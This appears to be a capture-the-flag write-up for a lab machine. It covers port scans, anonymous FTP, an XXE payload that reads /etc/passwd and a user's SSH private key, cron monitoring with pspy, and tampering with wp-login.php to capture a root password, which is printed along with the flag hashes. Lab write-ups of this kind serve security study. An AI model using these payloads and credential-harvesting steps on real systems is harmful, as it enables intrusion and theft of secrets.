Nmap -sV -T5 10.10.10.78
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Running dirbuster with medium wordlist
10.10.10.78/hosts.php => There are 4294967294 possible hosts for
This is CIDR notation /0 or Netmask 0.0.0.0
Possible Apache vulnerability
In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, use of the ap_get_basic_auth_pw() by third-party modules outside of the authentication phase may lead to authentication requirements being bypassed.
OpenSSH CVE details
Attempting to ssh reveals we need a publickey
firstname.lastname@example.org: Permission denied (publickey).
Dirbuster found /server-status/ directory. Must be something in there.
Nothing found with php,xml,txt extensions
Header of the index.html page shows
If-none-match “2c39-560a6a98ed804-gzip” which will return a 304 error if the requested page has this etag_value
Connecting to the ftpserver as anonymous there is a file “test.txt”
Using “get test.txt -” we can see the contents
****This is xml syntax. This is a hint to use XML External Entity Attack (XXE) which is on the 2017 OWASP top 10 list. This allows us to exploit weakly configured XML parsers and obtain information on the server. However, for this to work we must pay attention to the flags in the file found to understand how we will obtain the desired data.
You can test if the site may be vulnerable to XXE by replacing the filename with /dev/random and if this triggers a loop of some sort then it is a good indicator that it is vulnerable.
<?xml version=”1.0” encoding=”ISO-8859-1”?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM “file=///etc/passwd” >]>
This will get us the /etc/passwd file so we may discover the users on the system. We have learned so far that we require a public key in order to access the shell via ssh. So let’s look if there are any keys available on the users found. The first user that stood out to me was the one with a home directory of course, florian.
Replacing etc/passwd with “home/florian/.ssh/id_rsa” will reveal the public key. Use this to obtain a shell on the box.
User.txt = f43bdfbcfd3f2a955a7b67c7a6e21359
Discovered user “cliff”
Using pspy I was able to notice commands running on a timely basis. Every minute commands would run.
2018/07/13 08:37:01 CMD: UID=1001 PID=114159 | /usr/bin/python /home/cliff/wp-login.py
2018/07/13 08:37:01 CMD: UID=1001 PID=114158 | /bin/sh -c /usr/bin/python /home/cliff/wp-login.py
2018/07/13 08:37:01 CMD: UID=0 PID=114157 | /usr/sbin/CRON -f
2018/07/13 08:37:01 CMD: UID=1001 PID=114160 | /usr/bin/python /home/cliff/wp-login.py
2018/07/13 08:37:01 CMD: UID=1001 PID=114162 | /usr/bin/python /home/cliff/wp-login.py
We can see the wp-login.py script being ran. Let’s assume that this script is inputting valid credentials into the wp-login.php file that we have the ability to alter.
Adding the following line to the wp-login.php file we can obtain the user input values.
Noticing the URLencoding we decode the pwd value and then are able to su to root with the password !KRgYs(JFO!&MTr)lf
Root.txt = 9a9da52d7aad358699a96a5754595de6